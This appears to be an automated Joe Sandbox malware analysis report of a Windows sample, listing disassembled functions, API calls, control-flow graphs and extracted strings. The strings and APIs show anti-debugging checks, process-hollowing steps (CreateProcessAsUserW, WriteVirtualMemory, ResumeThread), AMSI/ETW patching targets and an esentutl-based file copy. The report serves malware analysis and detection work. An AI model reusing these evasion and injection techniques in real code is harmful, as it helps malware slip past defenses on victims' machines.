                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1ef358d9502a1de83afa60d2a196127c36595c50085a77fe50aefaa1cc1aee27
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 61e560a17770df133b5ce44c5d02863d9313f43ab419f20b0aaaa61847be07ad
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ef358d9502a1de83afa60d2a196127c36595c50085a77fe50aefaa1cc1aee27
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1201F231648704AFF712EFA1DCA296FBFBDE749B10B5108B5F505E26D0EA34A920C860
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InetIsOffline.URL(00000000,00000000,02B1B784,?,?,?,00000000,00000000), ref: 02B0F801
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B0FAEB,UacInitialize,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,Initialize), ref: 02B0F6EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B0F700
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B0F754
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B0F766
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B0F77D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C6B8B8,?,02B10751,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession), ref: 02AFC37B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDAB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDDB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B0DDF0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B0DE1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B0DE25
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E80: GetFileAttributesA.KERNEL32(00000000,?,02B1356F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,Initialize), ref: 02AF7E8B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B1370D,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,Initialize,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8), ref: 02AF8055
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 297057983-2644593349
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cc5195456597334ed6cab0cafa2b75f1c6cbd1f3734cd6480cc09aa530d4cc26
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 014484529a73543513d336285722779ee60e603b0876d6aee7b65b44c5319378
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc5195456597334ed6cab0cafa2b75f1c6cbd1f3734cd6480cc09aa530d4cc26
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5141E35B4421D8FDB91EBA4DE80ACF73B6EF89304F5040E1B609AB654DE34AE958F41
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B18128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 4574 2b18128-2b18517 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af48ec 4689 2b193a1-2b19524 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af48ec 4574->4689 4690 2b1851d-2b186f0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af47ec call 2af49a0 call 2af4d74 call 2af4df0 CreateProcessAsUserW 4574->4690 4779 2b19cf5-2b1b2fa call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 * 16 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2af46d4 * 2 call 2b089d0 call 2b07c10 call 2b08338 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 ExitProcess 4689->4779 4780 2b1952a-2b19539 call 2af48ec 4689->4780 4799 2b186f2-2b18769 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 4690->4799 4800 2b1876e-2b18879 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 4690->4800 4780->4779 4788 2b1953f-2b19812 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b0f094 call 2af4860 call 2af49a0 call 2af46d4 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af7e5c 4780->4788 5046 2b19818-2b19aea call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b0e358 call 2af4530 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4de0 * 2 call 2af4764 call 2b0dc8c 4788->5046 5047 2b19aef-2b19cf0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af49f8 call 2b08d70 4788->5047 4799->4800 4900 2b18880-2b18ba0 call 2af49f8 call 2b0de50 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b0d164 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 4800->4900 4901 2b1887b-2b1887e 4800->4901 5217 2b18ba2-2b18bb4 call 2b08730 4900->5217 5218 2b18bb9-2b1939c call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 ResumeThread call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 CloseHandle call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2b08080 call 2b0894c * 6 CloseHandle call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 4900->5218 4901->4900 5046->5047 5047->4779 5217->5218 5218->4689
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C6B7E0,02C6B824,OpenSession,02B77380,02B1B7B8,UacScan,02B77380), ref: 02B186E9
                                                                                                                                                                                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8), ref: 02B18D33
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,00000000,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380), ref: 02B18EB2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B77380,02B1B7B8,UacInitialize,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380), ref: 02B192A4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DD5E), ref: 02B0DCCB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B0DD05
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B0DD32
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B0DD3B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B083C2), ref: 02B083A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,Initialize,02B77380,02B1B7B8,00000000,00000000,00000000,ScanString,02B77380,02B1B7B8), ref: 02B1B2FA
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 429dcf1d505352bddf94d31002e1364a89da6ce80c70cc5cf586dbd1e534dfbd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23c4ae7857fcd0c3a3357cc377444a64ab9eadb50573730103e35b6709da202d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 429dcf1d505352bddf94d31002e1364a89da6ce80c70cc5cf586dbd1e534dfbd
